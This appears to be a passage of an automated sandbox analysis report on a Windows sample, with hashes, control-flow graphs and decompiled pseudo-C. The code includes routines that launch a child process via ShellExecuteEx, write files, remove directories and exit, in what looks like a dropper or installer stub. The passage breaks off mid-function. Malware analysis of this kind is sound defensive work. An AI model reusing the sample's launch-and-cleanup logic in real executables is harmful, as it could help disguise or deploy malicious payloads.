                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTemp
                                                                                                                                                  • String ID: GetLongPathNameA$Kernel32.DLL
                                                                                                                                                  • API String ID: 752937943-822094646
                                                                                                                                                  • Opcode ID: f2ba6410edf8bde28fa5554e8a9c22902d5f8ca1b7105de9d70a6170c437be0b
                                                                                                                                                  • Instruction ID: 3562a466a888384f8ba7b5ae80b98f608e44e67bd8cf52f83c325266dc9a6611
                                                                                                                                                  • Opcode Fuzzy Hash: f2ba6410edf8bde28fa5554e8a9c22902d5f8ca1b7105de9d70a6170c437be0b
                                                                                                                                                  • Instruction Fuzzy Hash: 5CF0B4722012142BC32127755D4CF6F3A6CCB82751B04003AF944B2142CE7D5D1082BE
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 344 402761-402763 345 402768-402773 344->345 345->345 346 402775-4027de call 403100 * 3 ShellExecuteEx 345->346 353 4027e2-4027ff Sleep GetExitCodeProcess 346->353 354 402801-40280b 353->354 355 40280f 353->355 354->355 356 40280d-402839 call 407550 * 3 354->356 355->353
                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                  			E00402761() {
                                                                                                                                                  				intOrPtr _t32;
                                                                                                                                                  				int _t34;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                  
                                                                                                                                                  				_t44 = 0x14;
                                                                                                                                                  				do {
                                                                                                                                                  					_t50 = _t50 - 4;
                                                                                                                                                  					 *_t50 = 0;
                                                                                                                                                  					_t44 = _t44 - 1;
                                                                                                                                                  				} while (_t44 != 0);
                                                                                                                                                  				E00403100(_t50,  *((intOrPtr*)(_t50 + 0x5c)));
                                                                                                                                                  				E00403100(_t50 + 4,  *((intOrPtr*)(_t50 + 0x60)));
                                                                                                                                                  				E00403100(_t50 + 8,  *((intOrPtr*)(_t50 + 0x64)));
                                                                                                                                                  				_t48 = _t50 + 0xc;
                                                                                                                                                  				 *_t48 = 0x3c;
                                                                                                                                                  				 *((intOrPtr*)(_t48 + 4)) = 0x140;
                                                                                                                                                  				 *((intOrPtr*)(_t48 + 0x1c)) = 0;
                                                                                                                                                  				 *(_t48 + 0xc) = "open";
                                                                                                                                                  				 *((intOrPtr*)(_t48 + 0x10)) =  *_t50;
                                                                                                                                                  				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t50 + 8));
                                                                                                                                                  				 *((intOrPtr*)(_t48 + 0x18)) =  *((intOrPtr*)(_t50 + 4));
                                                                                                                                                  				_t32 = _t50 + 0xc;
                                                                                                                                                  				_push(_t32); // executed
                                                                                                                                                  				L0040800B(); // executed
                                                                                                                                                  				 *((intOrPtr*)(_t50 + 0x48)) = _t32;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					Sleep(0x19); // executed
                                                                                                                                                  					_t34 = GetExitCodeProcess( *(_t50 + 0x48), _t50 + 0x4c); // executed
                                                                                                                                                  					if(_t34 != 0 &&  *(_t50 + 0x4c) != 0x103) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return E00407550(E00407550(E00407550(1,  *_t50),  *((intOrPtr*)(_t50 + 4))),  *((intOrPtr*)(_t50 + 8)));
                                                                                                                                                  			}








                                                                                                                                                  0x00402763
                                                                                                                                                  0x00402768
                                                                                                                                                  0x00402768
                                                                                                                                                  0x0040276b
                                                                                                                                                  0x00402772
                                                                                                                                                  0x00402772
                                                                                                                                                  0x0040277c
                                                                                                                                                  0x00402789
                                                                                                                                                  0x00402796
                                                                                                                                                  0x0040279f
                                                                                                                                                  0x004027a3
                                                                                                                                                  0x004027aa
                                                                                                                                                  0x004027b1
                                                                                                                                                  0x004027bd
                                                                                                                                                  0x004027c3
                                                                                                                                                  0x004027ca
                                                                                                                                                  0x004027d1
                                                                                                                                                  0x004027d4
                                                                                                                                                  0x004027d8
                                                                                                                                                  0x004027d9
                                                                                                                                                  0x004027de
                                                                                                                                                  0x004027e2
                                                                                                                                                  0x004027e7
                                                                                                                                                  0x004027f8
                                                                                                                                                  0x004027ff
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040280f
                                                                                                                                                  0x00402839

                                                                                                                                                  APIs
                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 004027D9
                                                                                                                                                  • Sleep.KERNEL32(00000019), ref: 004027E7
                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 004027F8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CodeExecuteExitProcessShellSleep
                                                                                                                                                  • String ID: open
                                                                                                                                                  • API String ID: 3887608683-2758837156
                                                                                                                                                  • Opcode ID: 52a67e558ad29990cc8f225169e9bbe56d7f2f31611fe38e94e8209ad79b84ad
                                                                                                                                                  • Instruction ID: 26639f79705cc0b5153d4f828301450fc79178279bf791e28a5e3737258c8c49
                                                                                                                                                  • Opcode Fuzzy Hash: 52a67e558ad29990cc8f225169e9bbe56d7f2f31611fe38e94e8209ad79b84ad
                                                                                                                                                  • Instruction Fuzzy Hash: 41216A71008209AFC700EF15C845A9FBBE8FB84304F00883EF598662D0D779EA15CB56
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 371 406330-406343 372 406365-40636e 371->372 373 406345-406362 SetFilePointer 371->373 374 406370-40637d 372->374 375 4063de-4063df call 405f90 372->375 373->372 376 4063cb-4063db 374->376 377 40637f-406382 374->377 381 4063e4-4063e9 375->381 379 406384-406387 377->379 380 4063b6-4063c8 377->380 382 4063a3-4063b3 379->382 383 406389-4063a0 memcpy 379->383 384 40640b-40642a memcpy 381->384 385 4063eb-406408 WriteFile 381->385
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406330(void** _a4, void* _a8, int _a12) {
                                                                                                                                                  				long _v4;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				void* _t57;
                                                                                                                                                  				void* _t59;
                                                                                                                                                  				int _t71;
                                                                                                                                                  				void** _t72;
                                                                                                                                                  
                                                                                                                                                  				_t72 = _a4;
                                                                                                                                                  				_v4 = 0;
                                                                                                                                                  				if(_t72[5] == 1) {
                                                                                                                                                  					SetFilePointer( *_t72,  ~(_t72[3]), 0, 1); // executed
                                                                                                                                                  					_t72[5] = 0;
                                                                                                                                                  					_t72[3] = _t72[2];
                                                                                                                                                  				}
                                                                                                                                                  				_t51 = _t72[3];
                                                                                                                                                  				_t71 = _a12;
                                                                                                                                                  				if(_t51 <= _t71) {
                                                                                                                                                  					E00405F90(_t72);
                                                                                                                                                  					_t34 = _t72[2];
                                                                                                                                                  					if(_t71 < _t34) {
                                                                                                                                                  						memcpy(_t72[1] - _t72[3] + _t34, _a8, _t71);
                                                                                                                                                  						_t72[3] = _t72[3] - _t71;
                                                                                                                                                  						return _t71;
                                                                                                                                                  					} else {
                                                                                                                                                  						WriteFile( *_t72, _a8, _t71,  &_v4, 0);
                                                                                                                                                  						return _v4;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t42 = _t72[2] + _t72[1] - _t51;
                                                                                                                                                  					_t57 = _t71 - 1;
                                                                                                                                                  					if(_t57 == 0) {
                                                                                                                                                  						 *_t42 =  *_a8;
                                                                                                                                                  						_t72[3] = _t72[3] - _t71;
                                                                                                                                                  						return _t71;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t59 = _t57 - 1;
                                                                                                                                                  						if(_t59 == 0) {
                                                                                                                                                  							 *_t42 =  *_a8;
                                                                                                                                                  							_t72[3] = _t72[3] - _t71;
                                                                                                                                                  							return _t71;
                                                                                                                                                  						} else {
                                                                                                                                                  							if(_t59 == 2) {
                                                                                                                                                  								 *_t42 =  *_a8;
                                                                                                                                                  								_t72[3] = _t72[3] - _t71;
                                                                                                                                                  								return _t71;
                                                                                                                                                  							} else {
                                                                                                                                                  								memcpy(_t42, _a8, _t71);
                                                                                                                                                  								_t72[3] = _t72[3] - _t71;
                                                                                                                                                  								return _t71;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}











                                                                                                                                                  0x00406332
                                                                                                                                                  0x0040633b
                                                                                                                                                  0x00406343
                                                                                                                                                  0x00406352
                                                                                                                                                  0x0040635b
                                                                                                                                                  0x00406362
                                                                                                                                                  0x00406362
                                                                                                                                                  0x00406365
                                                                                                                                                  0x00406368
                                                                                                                                                  0x0040636e
                                                                                                                                                  0x004063df
                                                                                                                                                  0x004063e4
                                                                                                                                                  0x004063e9
                                                                                                                                                  0x0040641a
                                                                                                                                                  0x00406422
                                                                                                                                                  0x0040642a
                                                                                                                                                  0x004063eb
                                                                                                                                                  0x004063fb
                                                                                                                                                  0x00406408
                                                                                                                                                  0x00406408
                                                                                                                                                  0x00406370
                                                                                                                                                  0x00406376
                                                                                                                                                  0x0040637a
                                                                                                                                                  0x0040637d
                                                                                                                                                  0x004063d1
                                                                                                                                                  0x004063d3
                                                                                                                                                  0x004063db
                                                                                                                                                  0x0040637f
                                                                                                                                                  0x0040637f
                                                                                                                                                  0x00406382
                                                                                                                                                  0x004063bd
                                                                                                                                                  0x004063c0
                                                                                                                                                  0x004063c8
                                                                                                                                                  0x00406384
                                                                                                                                                  0x00406387
                                                                                                                                                  0x004063a9
                                                                                                                                                  0x004063ab
                                                                                                                                                  0x004063b3
                                                                                                                                                  0x00406389
                                                                                                                                                  0x00406390
                                                                                                                                                  0x00406398
                                                                                                                                                  0x004063a0
                                                                                                                                                  0x004063a0
                                                                                                                                                  0x00406387
                                                                                                                                                  0x00406382
                                                                                                                                                  0x0040637d

                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,00000000,00000001,?,?,?,00406298,00000000,?,?,?,020405A8,00000000), ref: 00406352
                                                                                                                                                  • memcpy.MSVCRT ref: 00406390
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointermemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1104741977-0
                                                                                                                                                  • Opcode ID: 871ba12d0a710b8b10be5d67f70c539bcef7555e48d6414b570282c5163502cc
                                                                                                                                                  • Instruction ID: f3a8af50231a035adb1325dfd7a6e35cec90defb10c0b62dd41d6b31aad5b5db
                                                                                                                                                  • Opcode Fuzzy Hash: 871ba12d0a710b8b10be5d67f70c539bcef7555e48d6414b570282c5163502cc
                                                                                                                                                  • Instruction Fuzzy Hash: 09316C763006009FC224DF2AD448E5BF7E9EFD4321F14C82EE69697B90C634E854CBA6
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 386 4015dd 387 401672-401673 call 40505e 386->387 391 4015e2-4015ea 387->391 392 4015c5-4015d8 _rmdir 387->392 394 40162b-401633 391->394 395 4015ec-4015fa call 405066 391->395 393 401ba4-401bb4 ExitProcess HeapDestroy ExitProcess 392->393 394->387 397 401635-401643 call 405074 394->397 400 401628-401629 395->400 401 4015fc-401626 call 4045fc call 4030f0 call 404925 395->401 403 401671 397->403 404 401645-40166f call 4045fc call 4030f0 call 404925 397->404 400->387 417 401678-4016cd call 4031f0 call 406860 call 403de0 call 4074c0 401->417 403->387 404->417 426 4016fd-40170f call 4020b1 417->426 427 4016cf-4016f8 call 4036a2 _rmdir 417->427 432 401711-401716 426->432 433 40171b-4017b0 call 401d3f call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020b1 426->433 427->393 432->433 446 401a25-401a69 call 4074f0 * 3 call 4030f0 call 406170 433->446 447 4017b6-4017fe call 403a18 call 403de0 call 4074c0 433->447 471 401a87-401ac0 call 405ea0 call 402025 call 4036a2 _rmdir 446->471 472 401a6b-401ad2 call 406250 call 405fd0 call 4074c0 446->472 461 401800-401809 447->461 462 401812 447->462 461->462 465 40180b-401810 461->465 463 401814-401816 462->463 463->446 466 40181c-401863 call 405dd5 call 4036f8 call 4030f0 call 4074c0 463->466 465->463 492 4019c6-401a20 call 403a79 call 405e15 call 405e90 _rmdir 466->492 493 401869-401893 call 4074f0 call 4030f0 call 4074c0 466->493 471->393 494 401ad4-401ada call 402118 472->494 495 401adf-401b92 call 4074f0 * 2 call 402761 call 402025 call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 472->495 492->393 514 4018a0-4018b2 call 406230 493->514 515 401895-40189b call 402118 493->515 494->495 495->393 522 401998-4019aa call 406170 514->522 523 4018b8-401937 call 405fd0 call 4074f0 * 5 call 4036a2 514->523 515->514 522->492 533 4019ac-4019c1 call 406250 call 405fd0 522->533 523->522 552 401939-401993 call 403a79 call 405e15 call 405e90 _rmdir 523->552 533->492 552->393
                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E004015DD(void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                  				intOrPtr _t11;
                                                                                                                                                  				intOrPtr _t15;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				intOrPtr _t17;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  				int _t22;
                                                                                                                                                  				intOrPtr _t25;
                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                  				int _t31;
                                                                                                                                                  				int _t37;
                                                                                                                                                  				intOrPtr _t59;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                  				intOrPtr _t66;
                                                                                                                                                  				int _t69;
                                                                                                                                                  				intOrPtr _t71;
                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                  				intOrPtr _t78;
                                                                                                                                                  				void* _t80;
                                                                                                                                                  				intOrPtr _t97;
                                                                                                                                                  				intOrPtr _t98;
                                                                                                                                                  				intOrPtr _t99;
                                                                                                                                                  				void* _t101;
                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                  				intOrPtr _t108;
                                                                                                                                                  				intOrPtr _t116;
                                                                                                                                                  				intOrPtr _t117;
                                                                                                                                                  				intOrPtr _t121;
                                                                                                                                                  				intOrPtr _t125;
                                                                                                                                                  				void* _t130;
                                                                                                                                                  				void* _t131;
                                                                                                                                                  				void* _t133;
                                                                                                                                                  				void* _t134;
                                                                                                                                                  				intOrPtr _t135;
                                                                                                                                                  				intOrPtr _t137;
                                                                                                                                                  				void* _t138;
                                                                                                                                                  				intOrPtr _t139;
                                                                                                                                                  				intOrPtr _t140;
                                                                                                                                                  				intOrPtr _t141;
                                                                                                                                                  				intOrPtr _t142;
                                                                                                                                                  				intOrPtr _t143;
                                                                                                                                                  				intOrPtr _t144;
                                                                                                                                                  				void* _t145;
                                                                                                                                                  				intOrPtr _t147;
                                                                                                                                                  				void* _t148;
                                                                                                                                                  				intOrPtr _t149;
                                                                                                                                                  				intOrPtr _t150;
                                                                                                                                                  				intOrPtr _t151;
                                                                                                                                                  				intOrPtr _t152;
                                                                                                                                                  				void* _t153;
                                                                                                                                                  				intOrPtr _t154;
                                                                                                                                                  				intOrPtr _t155;
                                                                                                                                                  				intOrPtr _t157;
                                                                                                                                                  				intOrPtr _t159;
                                                                                                                                                  				intOrPtr _t160;
                                                                                                                                                  				intOrPtr _t161;
                                                                                                                                                  				intOrPtr _t162;
                                                                                                                                                  				void* _t163;
                                                                                                                                                  				void* _t164;
                                                                                                                                                  				void* _t165;
                                                                                                                                                  				intOrPtr* _t166;
                                                                                                                                                  				intOrPtr* _t167;
                                                                                                                                                  
                                                                                                                                                  				_t165 = __esi;
                                                                                                                                                  				_t164 = __edi;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_push(E0040505E());
                                                                                                                                                  					if(0x10 ==  *_t166) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = 0x332d -  *_t166;
                                                                                                                                                  					if(0x332d !=  *_t166) {
                                                                                                                                                  						__eflags = 0x332c -  *_t166;
                                                                                                                                                  						if(0x332c !=  *_t166) {
                                                                                                                                                  							continue;
                                                                                                                                                  						} else {
                                                                                                                                                  							_push(E00405074());
                                                                                                                                                  							__eflags = 3 -  *_t166;
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								continue;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t11 =  *0x40b3b0; // 0x0
                                                                                                                                                  								E004045FC(__eflags, 2, _t11);
                                                                                                                                                  								_t130 = _t11;
                                                                                                                                                  								E004030F0(0x40b194, _t130);
                                                                                                                                                  								E00404925(_t164, __eflags, 0);
                                                                                                                                                  								_t167 = _t166 + 8;
                                                                                                                                                  								goto L12;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_push(E00405066());
                                                                                                                                                  						__eflags = 4 -  *_t166;
                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                  							continue;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t108 =  *0x40b3b0; // 0x0
                                                                                                                                                  							E004045FC(__eflags, 2, _t108);
                                                                                                                                                  							_t163 = _t108;
                                                                                                                                                  							E004030F0(0x40b194, _t163);
                                                                                                                                                  							E00404925(_t164, __eflags, 0);
                                                                                                                                                  							_t167 = _t166 + 8;
                                                                                                                                                  							L12:
                                                                                                                                                  							_t15 =  *0x40b3b0; // 0x0
                                                                                                                                                  							_push(_t15);
                                                                                                                                                  							_t16 = E004031F0( *0x40b194);
                                                                                                                                                  							_t17 =  *0x40b194; // 0x0
                                                                                                                                                  							E00406860(__eflags, _t17, _t16, _t15);
                                                                                                                                                  							 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  							_t19 =  *0x40b3b0; // 0x0
                                                                                                                                                  							E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                  							_t131 = _t19;
                                                                                                                                                  							_t121 = _t19;
                                                                                                                                                  							 *0x40b3b0 = _t121;
                                                                                                                                                  							_t122 = _t121 +  *0x40a390;
                                                                                                                                                  							__eflags = _t131 +  *0x40a390;
                                                                                                                                                  							E004074C0(_t121 +  *0x40a390, _t131 +  *0x40a390);
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								_t22 = E004020B1( *0x40b174, 0x40a0ca);
                                                                                                                                                  								__eflags = _t22;
                                                                                                                                                  								if(_t22 != 0) {
                                                                                                                                                  									_t104 =  *0x40b130; // 0x40c154
                                                                                                                                                  									 *0x40b198 = _t104;
                                                                                                                                                  								}
                                                                                                                                                  								_push( *0x40b118);
                                                                                                                                                  								_push( *0x40b114);
                                                                                                                                                  								_push( *0x40b110);
                                                                                                                                                  								_push( *0x40b198);
                                                                                                                                                  								_push( *0x40b190);
                                                                                                                                                  								_push( *0x40b18c);
                                                                                                                                                  								_push( *0x40b188);
                                                                                                                                                  								_push( *0x40b194);
                                                                                                                                                  								_push( *0x40b174);
                                                                                                                                                  								E00401D3F();
                                                                                                                                                  								_t25 =  *0x40b3b0; // 0x0
                                                                                                                                                  								_push(_t25);
                                                                                                                                                  								E00403DE0( *0x40b104,  *0x40b110);
                                                                                                                                                  								_t133 = _t25;
                                                                                                                                                  								E004030F0(0x40b19c, _t133);
                                                                                                                                                  								_t28 =  *0x40b3b0; // 0x0
                                                                                                                                                  								_push(_t28);
                                                                                                                                                  								E00403DE0( *0x40b108,  *0x40b114);
                                                                                                                                                  								_t134 = _t28;
                                                                                                                                                  								E004030F0(0x40b1a0, _t134);
                                                                                                                                                  								_t31 = E004020B1( *0x40b174, "DFINOPS");
                                                                                                                                                  								__eflags = _t31;
                                                                                                                                                  								if(_t31 == 0) {
                                                                                                                                                  									L32:
                                                                                                                                                  									_t135 =  *0x40b12c; // 0x21d4838
                                                                                                                                                  									_push( *0x40b3b0);
                                                                                                                                                  									E004074F0(_t135);
                                                                                                                                                  									E004074F0(0x40a0ba);
                                                                                                                                                  									_t137 =  *0x40b184; // 0x21d49e0
                                                                                                                                                  									E004074F0(_t137);
                                                                                                                                                  									_t122 = 0x40b184;
                                                                                                                                                  									_pop(_t138);
                                                                                                                                                  									E004030F0(0x40b184, _t138);
                                                                                                                                                  									_push( *0x40b184);
                                                                                                                                                  									_t37 = E00406170(__eflags, 1);
                                                                                                                                                  									__eflags = _t37;
                                                                                                                                                  									if(_t37 == 0) {
                                                                                                                                                  										E00405EA0( *0x40b184);
                                                                                                                                                  										E00402025();
                                                                                                                                                  										_push(0x10);
                                                                                                                                                  										E004036A2( *0x40b13c,  *0x40b158);
                                                                                                                                                  										_push( *0x40b12c);
                                                                                                                                                  										L00403196();
                                                                                                                                                  										ExitProcess(1);
                                                                                                                                                  									} else {
                                                                                                                                                  										E00406250(_t164, 1,  *0x40b19c);
                                                                                                                                                  										E00405FD0(1);
                                                                                                                                                  										_t139 =  *0x40b1a0; // 0x21d4828
                                                                                                                                                  										_t122 = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										E004074C0(0, _t139);
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											_push( *0x40b1a0);
                                                                                                                                                  											E00402118();
                                                                                                                                                  										}
                                                                                                                                                  										_push( *0x40b3b0);
                                                                                                                                                  										_t140 =  *0x40b17c; // 0x0
                                                                                                                                                  										_push( *0x40b3b0);
                                                                                                                                                  										E004074F0(_t140);
                                                                                                                                                  										_t141 =  *0x40b128; // 0x0
                                                                                                                                                  										E004074F0(_t141);
                                                                                                                                                  										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  										_push( *0x40b124);
                                                                                                                                                  										_push( *0x40b184);
                                                                                                                                                  										_t142 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  										_v56 = _v56 + _t142;
                                                                                                                                                  										E00402761();
                                                                                                                                                  										_pop( *0x40b3b0);
                                                                                                                                                  										E00402025();
                                                                                                                                                  										E00405EA0( *0x40b184); // executed
                                                                                                                                                  										_push( *0x40b3b0);
                                                                                                                                                  										_t59 =  *0x40b3b0; // 0x0
                                                                                                                                                  										E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                  										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  										_t143 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  										 *_t167 =  *_t167 + _t143;
                                                                                                                                                  										_t61 = E00405E15(_t59, _t59);
                                                                                                                                                  										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  										_t144 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  										 *_t167 =  *_t167 + _t144; // executed
                                                                                                                                                  										E00405E90(_t61,  *0x40b3b0); // executed
                                                                                                                                                  										_pop( *0x40b3b0);
                                                                                                                                                  										_push( *0x40b12c); // executed
                                                                                                                                                  										L00403196(); // executed
                                                                                                                                                  										ExitProcess(0);
                                                                                                                                                  									}
                                                                                                                                                  								} else {
                                                                                                                                                  									_t64 =  *0x40b3b0; // 0x0
                                                                                                                                                  									_push(_t64);
                                                                                                                                                  									E00403A18(0x40b1a0, 0, _t64);
                                                                                                                                                  									 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  									_t66 =  *0x40b3b0; // 0x0
                                                                                                                                                  									E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                  									_t145 = _t66;
                                                                                                                                                  									_t125 = _t66;
                                                                                                                                                  									 *0x40b3b0 = _t125;
                                                                                                                                                  									_t126 = _t125 +  *0x40a390;
                                                                                                                                                  									__eflags = _t145 +  *0x40a390;
                                                                                                                                                  									E004074C0(_t125 +  *0x40a390, _t145 +  *0x40a390);
                                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                                  										L21:
                                                                                                                                                  										_t69 = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  									} else {
                                                                                                                                                  										_t117 =  *0x40b170; // 0x0
                                                                                                                                                  										__eflags = _t117 - 1;
                                                                                                                                                  										if(_t117 != 1) {
                                                                                                                                                  											goto L21;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t69 = 1;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t69;
                                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                                  										goto L32;
                                                                                                                                                  									} else {
                                                                                                                                                  										_t71 =  *0x40b3b0; // 0x0
                                                                                                                                                  										_t72 =  *0x40b3b0; // 0x0
                                                                                                                                                  										E00405DD5(__eflags, _t72);
                                                                                                                                                  										 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  										_t147 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  										_v64 = _v64 + _t147;
                                                                                                                                                  										E004036F8(_t126, _t165,  *0x40b160, _t72, _t71);
                                                                                                                                                  										_t148 = _t71;
                                                                                                                                                  										E004030F0(0x40b1a4, _t148);
                                                                                                                                                  										_t149 =  *0x40b1a4; // 0x0
                                                                                                                                                  										_t122 = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										E004074C0(0, _t149);
                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                  											L31:
                                                                                                                                                  											_t77 =  *0x40b3b0; // 0x0
                                                                                                                                                  											_t78 =  *0x40b3b0; // 0x0
                                                                                                                                                  											E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                  											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  											_t150 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  											 *_t167 =  *_t167 + _t150;
                                                                                                                                                  											_t80 = E00405E15(_t78, _t78);
                                                                                                                                                  											 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  											_t151 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  											 *_t167 =  *_t167 + _t151;
                                                                                                                                                  											E00405E90(_t80, _t77);
                                                                                                                                                  											 *0x40b3b0 = _t77;
                                                                                                                                                  											_push( *0x40b12c);
                                                                                                                                                  											L00403196();
                                                                                                                                                  											ExitProcess(0);
                                                                                                                                                  										} else {
                                                                                                                                                  											_t152 =  *0x40b1a4; // 0x0
                                                                                                                                                  											_push( *0x40b3b0);
                                                                                                                                                  											E004074F0(_t152);
                                                                                                                                                  											_pop(_t153);
                                                                                                                                                  											E004030F0(0x40b124, _t153);
                                                                                                                                                  											_t154 =  *0x40b1a0; // 0x21d4828
                                                                                                                                                  											_t122 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											E004074C0(0, _t154);
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												_push( *0x40b1a0);
                                                                                                                                                  												E00402118();
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = E00406230(1,  *0x40b184);
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												L29:
                                                                                                                                                  												_push( *0x40b184);
                                                                                                                                                  												__eflags = E00406170(__eflags, 1);
                                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                                  													E00406250(_t164, 1,  *0x40b19c);
